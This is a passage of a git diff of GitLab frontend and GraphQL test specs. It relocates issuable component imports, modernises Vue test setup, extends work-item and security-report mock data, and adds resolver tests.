b/spec/frontend/vue_shared/issuable/list/components/issuable_tabs_spec.js @@ -1,7 +1,7 @@ import { GlTab, GlBadge } from '@gitlab/ui'; import { mount } from '@vue/test-utils'; -import IssuableTabs from '~/issuable_list/components/issuable_tabs.vue'; +import IssuableTabs from '~/vue_shared/issuable/list/components/issuable_tabs.vue'; import { mockIssuableListProps } from '../mock_data'; diff --git a/spec/frontend/issuable_list/mock_data.js b/spec/frontend/vue_shared/issuable/list/mock_data.js index e2fa99f7cc9..e2fa99f7cc9 100644 --- a/spec/frontend/issuable_list/mock_data.js +++ b/spec/frontend/vue_shared/issuable/list/mock_data.js diff --git a/spec/frontend/issuable_show/components/issuable_body_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_body_spec.js index 6fa298ca3f2..41bacf18a68 100644 --- a/spec/frontend/issuable_show/components/issuable_body_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_body_spec.js @@ -1,11 +1,11 @@ import { shallowMount } from '@vue/test-utils'; import { useFakeDate } from 'helpers/fake_date'; -import IssuableBody from '~/issuable_show/components/issuable_body.vue'; +import IssuableBody from '~/vue_shared/issuable/show/components/issuable_body.vue'; -import IssuableDescription from '~/issuable_show/components/issuable_description.vue'; -import IssuableEditForm from '~/issuable_show/components/issuable_edit_form.vue'; -import IssuableTitle from '~/issuable_show/components/issuable_title.vue'; +import IssuableDescription from '~/vue_shared/issuable/show/components/issuable_description.vue'; +import IssuableEditForm from '~/vue_shared/issuable/show/components/issuable_edit_form.vue'; +import IssuableTitle from '~/vue_shared/issuable/show/components/issuable_title.vue'; import TaskList from '~/task_list'; import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; diff --git a/spec/frontend/issuable_show/components/issuable_description_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_description_spec.js index 1058e5decfd..f2211e5b2bb 100644 --- a/spec/frontend/issuable_show/components/issuable_description_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_description_spec.js @@ -1,7 +1,7 @@ import { shallowMount } from '@vue/test-utils'; import $ from 'jquery'; -import IssuableDescription from '~/issuable_show/components/issuable_description.vue'; +import IssuableDescription from '~/vue_shared/issuable/show/components/issuable_description.vue'; import { mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/components/issuable_edit_form_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_edit_form_spec.js index 184c9fe251c..051ffd27af4 100644 --- a/spec/frontend/issuable_show/components/issuable_edit_form_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_edit_form_spec.js @@ -1,8 +1,8 @@ import { GlFormInput } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import IssuableEditForm from '~/issuable_show/components/issuable_edit_form.vue'; -import IssuableEventHub from '~/issuable_show/event_hub'; +import IssuableEditForm from '~/vue_shared/issuable/show/components/issuable_edit_form.vue'; +import IssuableEventHub from '~/vue_shared/issuable/show/event_hub'; import MarkdownField from '~/vue_shared/components/markdown/field.vue'; import { mockIssuableShowProps, mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/components/issuable_header_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_header_spec.js index b85f2dd1999..41735923957 100644 --- a/spec/frontend/issuable_show/components/issuable_header_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_header_spec.js @@ -2,7 +2,7 @@ import { GlIcon, GlAvatarLabeled } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import IssuableHeader from '~/issuable_show/components/issuable_header.vue'; +import IssuableHeader from '~/vue_shared/issuable/show/components/issuable_header.vue'; import { mockIssuableShowProps, mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/components/issuable_show_root_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_show_root_spec.js index 7ad409c3a74..d1eb1366225 100644 --- a/spec/frontend/issuable_show/components/issuable_show_root_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_show_root_spec.js @@ -1,10 +1,10 @@ import { shallowMount } from '@vue/test-utils'; -import IssuableBody from '~/issuable_show/components/issuable_body.vue'; -import IssuableHeader from '~/issuable_show/components/issuable_header.vue'; -import IssuableShowRoot from '~/issuable_show/components/issuable_show_root.vue'; +import IssuableBody from '~/vue_shared/issuable/show/components/issuable_body.vue'; +import IssuableHeader from '~/vue_shared/issuable/show/components/issuable_header.vue'; +import IssuableShowRoot from '~/vue_shared/issuable/show/components/issuable_show_root.vue'; -import IssuableSidebar from '~/issuable_sidebar/components/issuable_sidebar_root.vue'; +import IssuableSidebar from '~/vue_shared/issuable/sidebar/components/issuable_sidebar_root.vue'; import { mockIssuableShowProps, mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/components/issuable_title_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_title_spec.js index df6fbdea76b..1fcf37a0477 100644 --- a/spec/frontend/issuable_show/components/issuable_title_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_title_spec.js @@ -2,7 +2,7 @@ import { GlIcon, GlButton, GlIntersectionObserver } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -import IssuableTitle from '~/issuable_show/components/issuable_title.vue'; +import IssuableTitle from '~/vue_shared/issuable/show/components/issuable_title.vue'; import { mockIssuableShowProps, mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/mock_data.js b/spec/frontend/vue_shared/issuable/show/mock_data.js index 986d32b4982..f5f3ed58655 100644 --- a/spec/frontend/issuable_show/mock_data.js +++ b/spec/frontend/vue_shared/issuable/show/mock_data.js @@ -1,4 +1,4 @@ -import { mockIssuable as issuable } from '../issuable_list/mock_data'; +import { mockIssuable as issuable } from 'jest/vue_shared/issuable/list/mock_data'; export const mockIssuable = { ...issuable, diff --git a/spec/frontend/issuable_sidebar/components/issuable_sidebar_root_spec.js b/spec/frontend/vue_shared/issuable/sidebar/components/issuable_sidebar_root_spec.js index c872925cca2..788ba70ddc0 100644 --- a/spec/frontend/issuable_sidebar/components/issuable_sidebar_root_spec.js +++ b/spec/frontend/vue_shared/issuable/sidebar/components/issuable_sidebar_root_spec.js @@ -2,8 +2,8 @@ import { GlBreakpointInstance as bp } from '@gitlab/ui/dist/utils'; import Cookies from 'js-cookie'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; -import IssuableSidebarRoot from '~/issuable_sidebar/components/issuable_sidebar_root.vue'; -import { USER_COLLAPSED_GUTTER_COOKIE } from '~/issuable_sidebar/constants'; +import IssuableSidebarRoot from '~/vue_shared/issuable/sidebar/components/issuable_sidebar_root.vue'; +import { USER_COLLAPSED_GUTTER_COOKIE } from '~/vue_shared/issuable/sidebar/constants'; const MOCK_LAYOUT_PAGE_CLASS = 'layout-page'; diff --git a/spec/frontend/vue_shared/security_reports/mock_data.js b/spec/frontend/vue_shared/security_reports/mock_data.js index cdaeec78e47..2b1513bb0f8 100644 --- a/spec/frontend/vue_shared/security_reports/mock_data.js +++ b/spec/frontend/vue_shared/security_reports/mock_data.js @@ -341,12 +341,15 @@ export const securityReportMergeRequestDownloadPathsQueryNoArtifactsResponse = { export const securityReportMergeRequestDownloadPathsQueryResponse = { project: { + id: '1', mergeRequest: { + id: 'mr-1', headPipeline: { id: 'gid://gitlab/Ci::Pipeline/176', jobs: { nodes: [ { + id: 'job-1', name: 'secret_detection', artifacts: { nodes: [ @@ -368,6 +371,7 @@ export const securityReportMergeRequestDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-2', name: 'bandit-sast', artifacts: { nodes: [ @@ -389,6 +393,7 @@ export const securityReportMergeRequestDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-3', name: 'eslint-sast', artifacts: { nodes: [ @@ -410,6 +415,7 @@ export const securityReportMergeRequestDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-4', name: 'all_artifacts', artifacts: { nodes: [ @@ -449,11 +455,13 @@ export const securityReportMergeRequestDownloadPathsQueryResponse = { export const securityReportPipelineDownloadPathsQueryResponse = { project: { + id: 'project-1', pipeline: { id: 'gid://gitlab/Ci::Pipeline/176', jobs: { nodes: [ { + id: 'job-1', name: 'secret_detection', artifacts: { nodes: [ @@ -475,6 +483,7 @@ export const securityReportPipelineDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-2', name: 'bandit-sast', artifacts: { nodes: [ @@ -496,6 +505,7 @@ export const securityReportPipelineDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-3', name: 'eslint-sast', artifacts: { nodes: [ @@ -517,6 +527,7 @@ export const securityReportPipelineDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-4', name: 'all_artifacts', artifacts: { nodes: [ diff --git a/spec/frontend/vue_shared/translate_spec.js b/spec/frontend/vue_shared/translate_spec.js index 42aa28a6309..30417161968 100644 --- a/spec/frontend/vue_shared/translate_spec.js +++ b/spec/frontend/vue_shared/translate_spec.js @@ -1,9 +1,9 @@ -import { mount, createLocalVue } from '@vue/test-utils'; +import { mount } from '@vue/test-utils'; +import Vue from 'vue'; import locale from '~/locale'; import Translate from '~/vue_shared/translate'; -const localVue = createLocalVue(); -localVue.use(Translate); +Vue.use(Translate); describe('Vue translate filter', () => { const createTranslationMock = (key, ...translations) => { @@ -26,16 +26,13 @@ describe('Vue translate filter', () => { const translation = 'singular_translated'; createTranslationMock(key, translation); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ __('${key}') }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translation); }); @@ -45,16 +42,13 @@ describe('Vue translate filter', () => { const translationPlural = 'plural_multiple translation'; createTranslationMock(key, 'plural_singular translation', translationPlural); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ n__('${key}', 'plurals', 2) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translationPlural); }); @@ -67,31 +61,25 @@ describe('Vue translate filter', () => { }); it('and n === 1', () => { - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ n__('${key}', '%d days', 1) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe('1 singular translated'); }); it('and n > 1', () => { - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ n__('${key}', '%d days', 2) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe('2 plural translated'); }); @@ -107,31 +95,25 @@ describe('Vue translate filter', () => { }); it('and using two parameters', () => { - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ s__('Context', 'Foobar') }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(expectation); }); it('and using the pipe syntax', () => { - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ s__('${key}') }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(expectation); }); @@ -141,9 +123,8 @@ describe('Vue translate filter', () => { const translation = 'multiline string translated'; createTranslationMock('multiline string', translation); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ __(\` multiline @@ -151,9 +132,7 @@ describe('Vue translate filter', () => { \`) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translation); }); @@ -163,9 +142,8 @@ describe('Vue translate filter', () => { createTranslationMock('multiline string', 'multiline string singular', translation); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ n__( \` @@ -180,9 +158,7 @@ describe('Vue translate filter', () => { ) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translation); }); @@ -192,9 +168,8 @@ describe('Vue translate filter', () => { createTranslationMock('Context| multiline string', translation); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ s__( \` @@ -205,9 +180,7 @@ describe('Vue translate filter', () => { ) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translation); }); diff --git a/spec/frontend/work_items/components/item_title_spec.js b/spec/frontend/work_items/components/item_title_spec.js new file mode 100644 index 00000000000..0f6e7091c59 --- /dev/null +++ b/spec/frontend/work_items/components/item_title_spec.js @@ -0,0 +1,56 @@ +import { shallowMount } from '@vue/test-utils'; +import { escape } from 'lodash'; +import ItemTitle from '~/work_items/components/item_title.vue'; + +jest.mock('lodash/escape', () => jest.fn((fn) => fn)); + +const createComponent = ({ initialTitle = 'Sample title', disabled = false } = {}) => + shallowMount(ItemTitle, { + propsData: { + initialTitle, + disabled, + }, + }); + +describe('ItemTitle', () => { + let wrapper; + const mockUpdatedTitle = 'Updated title'; + const findInputEl = () => wrapper.find('span#item-title'); + + beforeEach(() => { + wrapper = createComponent(); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('renders title contents', () => { + expect(findInputEl().attributes()).toMatchObject({ + 'data-placeholder': 'Add a title...', + contenteditable: 'true', + }); + expect(findInputEl().text()).toBe('Sample title'); + }); + + it('renders title contents with editing disabled', () => { + wrapper = createComponent({ + disabled: true, + }); + + expect(wrapper.classes()).toContain('gl-cursor-not-allowed'); + expect(findInputEl().attributes('contenteditable')).toBe('false'); + }); + + it.each` + eventName | sourceEvent + ${'title-changed'} | ${'blur'} + ${'title-input'} | ${'keyup'} + `('emits "$eventName" event on input $sourceEvent', async ({ eventName, sourceEvent }) => { + findInputEl().element.innerText = mockUpdatedTitle; + await findInputEl().trigger(sourceEvent); + + expect(wrapper.emitted(eventName)).toBeTruthy(); + expect(escape).toHaveBeenCalledWith(mockUpdatedTitle); + }); +}); diff --git a/spec/frontend/work_items/mock_data.js b/spec/frontend/work_items/mock_data.js index efb4aa2feb2..9741a193258 100644 --- a/spec/frontend/work_items/mock_data.js +++ b/spec/frontend/work_items/mock_data.js @@ -1,13 +1,13 @@ export const workItemQueryResponse = { workItem: { - __typename: 'WorkItem', + __typename: 'LocalWorkItem', id: '1', type: 'FEATURE', widgets: { - __typename: 'WorkItemWidgetConnection', + __typename: 'LocalWorkItemWidgetConnection', nodes: [ { - __typename: 'TitleWidget', + __typename: 'LocalTitleWidget', type: 'TITLE', contentText: 'Test', }, @@ -15,3 +15,22 @@ export const workItemQueryResponse = { }, }, }; + +export const updateWorkItemMutationResponse = { + __typename: 'LocalUpdateWorkItemPayload', + workItem: { + __typename: 'LocalWorkItem', + id: '1', + widgets: { + __typename: 'LocalWorkItemWidgetConnection', + nodes: [ + { + __typename: 'LocalTitleWidget', + type: 'TITLE', + enabled: true, + contentText: 'Updated title', + }, + ], + }, + }, +}; diff --git a/spec/frontend/work_items/pages/create_work_item_spec.js b/spec/frontend/work_items/pages/create_work_item_spec.js new file mode 100644 index 00000000000..71e153d30c3 --- /dev/null +++ b/spec/frontend/work_items/pages/create_work_item_spec.js @@ -0,0 +1,94 @@ +import Vue, { nextTick } from 'vue'; +import VueApollo from 'vue-apollo'; +import { GlAlert } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import CreateWorkItem from '~/work_items/pages/create_work_item.vue'; +import ItemTitle from '~/work_items/components/item_title.vue'; +import { resolvers } from '~/work_items/graphql/resolvers'; + +Vue.use(VueApollo); + +describe('Create work item component', () => { + let wrapper; + let fakeApollo; + + const findAlert = () => wrapper.findComponent(GlAlert); + const findTitleInput = () => wrapper.findComponent(ItemTitle); + const findCreateButton = () => wrapper.find('[data-testid="create-button"]'); + const findCancelButton = () => wrapper.find('[data-testid="cancel-button"]'); + + const createComponent = ({ data = {} } = {}) => { + fakeApollo = createMockApollo([], resolvers); + wrapper = shallowMount(CreateWorkItem, { + apolloProvider: fakeApollo, + data() { + return { + ...data, + }; + }, + mocks: { + $router: { + go: jest.fn(), + push: jest.fn(), + }, + }, + }); + }; + + afterEach(() => { + wrapper.destroy(); + fakeApollo = null; + }); + + it('does not render error by default', () => { + createComponent(); + + expect(findAlert().exists()).toBe(false); + }); + + it('renders a disabled Create button when title input is empty', () => { + createComponent(); + + expect(findCreateButton().props('disabled')).toBe(true); + }); + + it('redirects to the previous page on Cancel button click', () => { + createComponent(); + findCancelButton().vm.$emit('click'); + + expect(wrapper.vm.$router.go).toHaveBeenCalledWith(-1); + }); + + it('hides the alert on dismissing the error', async () => { + createComponent({ data: { error: true } }); + expect(findAlert().exists()).toBe(true); + + findAlert().vm.$emit('dismiss'); + await nextTick(); + expect(findAlert().exists()).toBe(false); + }); + + describe('when title input field has a text', () => { + beforeEach(async () => { + const mockTitle = 'Test title'; + createComponent(); + await findTitleInput().vm.$emit('title-input', mockTitle); + }); + + it('renders a non-disabled Create button', () => { + expect(findCreateButton().props('disabled')).toBe(false); + }); + + it('redirects to the work item page on successful mutation', async () => { + wrapper.find('form').trigger('submit'); + await waitForPromises(); + + expect(wrapper.vm.$router.push).toHaveBeenCalled(); + }); + + // TODO: write a proper test here when we have a backend implementation + it.todo('shows an alert on mutation error'); + }); +}); diff --git a/spec/frontend/work_items/pages/work_item_root_spec.js b/spec/frontend/work_items/pages/work_item_root_spec.js index 64d02baed36..02795751f33 100644 --- a/spec/frontend/work_items/pages/work_item_root_spec.js +++ b/spec/frontend/work_items/pages/work_item_root_spec.js @@ -1,12 +1,16 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import Vue from 'vue'; +import { shallowMount } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; import workItemQuery from '~/work_items/graphql/work_item.query.graphql'; +import updateWorkItemMutation from '~/work_items/graphql/update_work_item.mutation.graphql'; import WorkItemsRoot from '~/work_items/pages/work_item_root.vue'; +import ItemTitle from '~/work_items/components/item_title.vue'; +import { resolvers } from '~/work_items/graphql/resolvers'; import { workItemQueryResponse } from '../mock_data'; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); const WORK_ITEM_ID = '1'; @@ -14,10 +18,10 @@ describe('Work items root component', () => { let wrapper; let fakeApollo; - const findTitle = () => wrapper.find('[data-testid="title"]'); + const findTitle = () => wrapper.findComponent(ItemTitle); const createComponent = ({ queryResponse = workItemQueryResponse } = {}) => { - fakeApollo = createMockApollo(); + fakeApollo = createMockApollo([], resolvers); fakeApollo.clients.defaultClient.cache.writeQuery({ query: workItemQuery, variables: { @@ -30,7 +34,6 @@ describe('Work items root component', () => { propsData: { id: WORK_ITEM_ID, }, - localVue, apolloProvider: fakeApollo, }); }; @@ -44,7 +47,28 @@ describe('Work items root component', () => { createComponent(); expect(findTitle().exists()).toBe(true); - expect(findTitle().text()).toBe('Test'); + expect(findTitle().props('initialTitle')).toBe('Test'); + }); + + it('updates the title when it is edited', async () => { + createComponent(); + jest.spyOn(wrapper.vm.$apollo, 'mutate'); + const mockUpdatedTitle = 'Updated title'; + + await findTitle().vm.$emit('title-changed', mockUpdatedTitle); + + expect(wrapper.vm.$apollo.mutate).toHaveBeenCalledWith({ + mutation: updateWorkItemMutation, + variables: { + input: { + id: WORK_ITEM_ID, + title: mockUpdatedTitle, + }, + }, + }); + + await waitForPromises(); + expect(findTitle().props('initialTitle')).toBe(mockUpdatedTitle); }); it('does not render the title if title is not in the widgets list', () => { diff --git a/spec/frontend/work_items/router_spec.js b/spec/frontend/work_items/router_spec.js index 0a57eab753f..6017c9d9dbb 100644 --- a/spec/frontend/work_items/router_spec.js +++ b/spec/frontend/work_items/router_spec.js @@ -1,5 +1,6 @@ import { mount } from '@vue/test-utils'; import App from '~/work_items/components/app.vue'; +import CreateWorkItem from '~/work_items/pages/create_work_item.vue'; import WorkItemsRoot from '~/work_items/pages/work_item_root.vue'; import { createRouter } from '~/work_items/router'; @@ -27,4 +28,10 @@ describe('Work items router', () => { expect(wrapper.find(WorkItemsRoot).exists()).toBe(true); }); + + it('renders create work item page on `/new` route', async () => { + await createComponent('/new'); + + expect(wrapper.findComponent(CreateWorkItem).exists()).toBe(true); + }); }); diff --git a/spec/frontend_integration/ide/helpers/ide_helper.js b/spec/frontend_integration/ide/helpers/ide_helper.js index 56b2e298aa3..54a522324f5 100644 --- a/spec/frontend_integration/ide/helpers/ide_helper.js +++ b/spec/frontend_integration/ide/helpers/ide_helper.js @@ -192,6 +192,13 @@ export const commit = async ({ newBranch = false, newMR = false, newBranchName = switchLeftSidebarTab('Commit'); screen.getByTestId('begin-commit-button').click(); + await waitForMonacoEditor(); + + const mrCheck = await screen.findByLabelText('Start a new merge request'); + if (Boolean(mrCheck.checked) !== newMR) { + mrCheck.click(); + } + if (!newBranch) { const option = await screen.findByLabelText(/Commit to .+ branch/); option.click(); @@ -201,12 +208,9 @@ export const commit = async ({ newBranch = false, newMR = false, newBranchName = const branchNameInput = await screen.findByTestId('ide-new-branch-name'); fireEvent.input(branchNameInput, { target: { value: newBranchName } }); - - const mrCheck = await screen.findByLabelText('Start a new merge request'); - if (Boolean(mrCheck.checked) !== newMR) { - mrCheck.click(); - } } screen.getByText('Commit').click(); + + await waitForMonacoEditor(); }; diff --git a/spec/frontend_integration/ide/helpers/start.js b/spec/frontend_integration/ide/helpers/start.js index 4451c1ee946..3c5ed9dfe20 100644 --- a/spec/frontend_integration/ide/helpers/start.js +++ b/spec/frontend_integration/ide/helpers/start.js @@ -4,16 +4,18 @@ import setWindowLocation from 'helpers/set_window_location_helper'; import { TEST_HOST } from 'helpers/test_constants'; import { initIde } from '~/ide'; import extendStore from '~/ide/stores/extend'; +import { getProject, getEmptyProject } from 'jest/../frontend_integration/test_helpers/fixtures'; import { IDE_DATASET } from './mock_data'; export default (container, { isRepoEmpty = false, path = '', mrId = '' } = {}) => { const projectName = isRepoEmpty ? 'lorem-ipsum-empty' : 'lorem-ipsum'; const pathSuffix = mrId ? `merge_requests/${mrId}` : `tree/master/-/${path}`; + const project = isRepoEmpty ? getEmptyProject() : getProject(); setWindowLocation(`${TEST_HOST}/-/ide/project/gitlab-test/${projectName}/${pathSuffix}`); const el = document.createElement('div'); - Object.assign(el.dataset, IDE_DATASET); + Object.assign(el.dataset, IDE_DATASET, { project: JSON.stringify(project) }); container.appendChild(el); const vm = initIde(el, { extendStore }); diff --git a/spec/frontend_integration/ide/user_opens_ide_spec.js b/spec/frontend_integration/ide/user_opens_ide_spec.js index f56cd008d1c..c9d78d1de8f 100644 --- a/spec/frontend_integration/ide/user_opens_ide_spec.js +++ b/spec/frontend_integration/ide/user_opens_ide_spec.js @@ -34,10 +34,10 @@ describe('IDE: User opens IDE', () => { expect(await screen.findByText('No files')).toBeDefined(); }); - it('shows a "New file" button', async () => { - const button = await screen.findByTitle('New file'); + it('shows a "New file" button', () => { + const buttons = screen.queryAllByTitle('New file'); - expect(button.tagName).toEqual('BUTTON'); + expect(buttons.map((x) => x.tagName)).toContain('BUTTON'); }); }); diff --git a/spec/frontend_integration/test_helpers/setup/index.js b/spec/frontend_integration/test_helpers/setup/index.js index 946ccbec00c..0c16592f2e2 100644 --- a/spec/frontend_integration/test_helpers/setup/index.js +++ b/spec/frontend_integration/test_helpers/setup/index.js @@ -1,4 +1,4 @@ -import '../../../frontend/test_setup'; +import 'helpers/shared_test_setup'; import './setup_globals'; import './setup_axios'; import './setup_serializers'; diff --git a/spec/frontend_integration/test_helpers/setup/setup_globals.js b/spec/frontend_integration/test_helpers/setup/setup_globals.js index b63a9a96372..ac5aeb1dd72 100644 --- a/spec/frontend_integration/test_helpers/setup/setup_globals.js +++ b/spec/frontend_integration/test_helpers/setup/setup_globals.js @@ -1,15 +1,10 @@ -import { setTestTimeout } from 'helpers/timeout'; +import { initializeTestTimeout } from 'helpers/timeout'; + +initializeTestTimeout(process.env.CI ? 20000 : 7000); beforeEach(() => { window.gon = { api_version: 'v4', relative_url_root: '', }; - - setTestTimeout(7000); - jest.useRealTimers(); -}); - -afterEach(() => { - jest.useFakeTimers(); }); diff --git a/spec/graphql/mutations/merge_requests/accept_spec.rb b/spec/graphql/mutations/merge_requests/accept_spec.rb index db75c64a447..c97c78ec206 100644 --- a/spec/graphql/mutations/merge_requests/accept_spec.rb +++ b/spec/graphql/mutations/merge_requests/accept_spec.rb @@ -5,14 +5,14 @@ require 'spec_helper' RSpec.describe Mutations::MergeRequests::Accept do include AfterNextHelpers - let_it_be(:user) { create(:user) } - let(:project) { create(:project, :public, :repository) } - subject(:mutation) { described_class.new(context: context, object: nil, field: nil) } - let_it_be(:context) do + let_it_be(:user) { create(:user) } + + let(:project) { create(:project, :public, :repository) } + let(:context) do GraphQL::Query::Context.new( - query: OpenStruct.new(schema: GitlabSchema), + query: double('query', schema: GitlabSchema), values: { current_user: user }, object: nil ) diff --git a/spec/graphql/mutations/merge_requests/create_spec.rb b/spec/graphql/mutations/merge_requests/create_spec.rb index ba0ac3cbe66..83af1e3f1b3 100644 --- a/spec/graphql/mutations/merge_requests/create_spec.rb +++ b/spec/graphql/mutations/merge_requests/create_spec.rb @@ -7,9 +7,10 @@ RSpec.describe Mutations::MergeRequests::Create do let_it_be(:project) { create(:project, :public, :repository) } let_it_be(:user) { create(:user) } - let_it_be(:context) do + + let(:context) do GraphQL::Query::Context.new( - query: OpenStruct.new(schema: nil), + query: double('query', schema: nil), values: { current_user: user }, object: nil ) diff --git a/spec/graphql/mutations/user_callouts/create_spec.rb b/spec/graphql/mutations/user_callouts/create_spec.rb index 93f227d8b82..eac39bdd1b0 100644 --- a/spec/graphql/mutations/user_callouts/create_spec.rb +++ b/spec/graphql/mutations/user_callouts/create_spec.rb @@ -13,7 +13,7 @@ RSpec.describe Mutations::UserCallouts::Create do let(:feature_name) { 'not_supported' } it 'does not create a user callout' do - expect { resolve }.not_to change(UserCallout, :count).from(0) + expect { resolve }.not_to change(Users::Callout, :count).from(0) end it 'returns error about feature name not being supported' do @@ -22,10 +22,10 @@ RSpec.describe Mutations::UserCallouts::Create do end context 'when feature name is supported' do - let(:feature_name) { UserCallout.feature_names.each_key.first.to_s } + let(:feature_name) { Users::Callout.feature_names.each_key.first.to_s } it 'creates a user callout' do - expect { resolve }.to change(UserCallout, :count).from(0).to(1) + expect { resolve }.to change(Users::Callout, :count).from(0).to(1) end it 'sets dismissed_at for the user callout' do diff --git a/spec/graphql/resolvers/board_list_issues_resolver_spec.rb b/spec/graphql/resolvers/board_list_issues_resolver_spec.rb index 53d2c8a853c..6907c55bd48 100644 --- a/spec/graphql/resolvers/board_list_issues_resolver_spec.rb +++ b/spec/graphql/resolvers/board_list_issues_resolver_spec.rb @@ -25,7 +25,7 @@ RSpec.describe Resolvers::BoardListIssuesResolver do let(:wildcard_started) { 'STARTED' } let(:filters) { { milestone_title: ["started"], milestone_wildcard_id: wildcard_started } } - it 'raises a mutually exclusive filter error when milstone wildcard and title are provided' do + it 'raises a mutually exclusive filter error when milestone wildcard and title are provided' do expect do resolve_board_list_issues(args: { filters: filters }) end.to raise_error(Gitlab::Graphql::Errors::ArgumentError) @@ -80,6 +80,16 @@ RSpec.describe Resolvers::BoardListIssuesResolver do expect(result).to match_array([]) end + + context 'when filtering by confidential' do + let(:confidential_issue) { create(:issue, project: project, labels: [label], relative_position: nil, confidential: true) } + + it 'returns matching issue' do + result = resolve_board_list_issues(args: { filters: { confidential: true } }) + + expect(result).to contain_exactly(confidential_issue) + end + end end end diff --git a/spec/graphql/resolvers/ci/runner_status_resolver_spec.rb b/spec/graphql/resolvers/ci/runner_status_resolver_spec.rb new file mode 100644 index 00000000000..fbef07b72e6 --- /dev/null +++ b/spec/graphql/resolvers/ci/runner_status_resolver_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::Ci::RunnerStatusResolver do + include GraphqlHelpers + + describe '#resolve' do + let(:user) { build(:user) } + let(:runner) { build(:ci_runner) } + + subject(:resolve_subject) { resolve(described_class, ctx: { current_user: user }, obj: runner, args: args) } + + context 'with legacy_mode' do + context 'set to 14.5' do + let(:args) do + { legacy_mode: '14.5' } + end + + it 'calls runner.status with specified legacy_mode' do + expect(runner).to receive(:status).with('14.5').once.and_return(:online) + + expect(resolve_subject).to eq(:online) + end + end + + context 'set to nil' do + let(:args) do + { legacy_mode: nil } + end + + it 'calls runner.status with specified legacy_mode' do + expect(runner).to receive(:status).with(nil).once.and_return(:stale) + + expect(resolve_subject).to eq(:stale) + end + end + end + end +end diff --git a/spec/graphql/resolvers/ci/runners_resolver_spec.rb b/spec/graphql/resolvers/ci/runners_resolver_spec.rb index bb8dadeca40..df6490df915 100644 --- a/spec/graphql/resolvers/ci/runners_resolver_spec.rb +++ b/spec/graphql/resolvers/ci/runners_resolver_spec.rb @@ -45,6 +45,7 @@ RSpec.describe Resolvers::Ci::RunnersResolver do let(:finder) { instance_double(::Ci::RunnersFinder) } let(:args) do { + active: true, status: 'active', type: :instance_type, tag_list: ['active_runner'], @@ -55,6 +56,7 @@ RSpec.describe Resolvers::Ci::RunnersResolver do let(:expected_params) do { + active: true, status_status: 'active', type_type: :instance_type, tag_name: ['active_runner'], diff --git a/spec/graphql/resolvers/clusters/agent_activity_events_resolver_spec.rb b/spec/graphql/resolvers/clusters/agent_activity_events_resolver_spec.rb new file mode 100644 index 00000000000..5a6b27e43a5 --- /dev/null +++ b/spec/graphql/resolvers/clusters/agent_activity_events_resolver_spec.rb @@ -0,0 +1,34 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::Clusters::AgentActivityEventsResolver do + include GraphqlHelpers + + it { expect(described_class.type).to eq(Types::Clusters::AgentActivityEventType) } + it { expect(described_class.null).to be_truthy } + + describe '#resolve' do + let_it_be(:agent) { 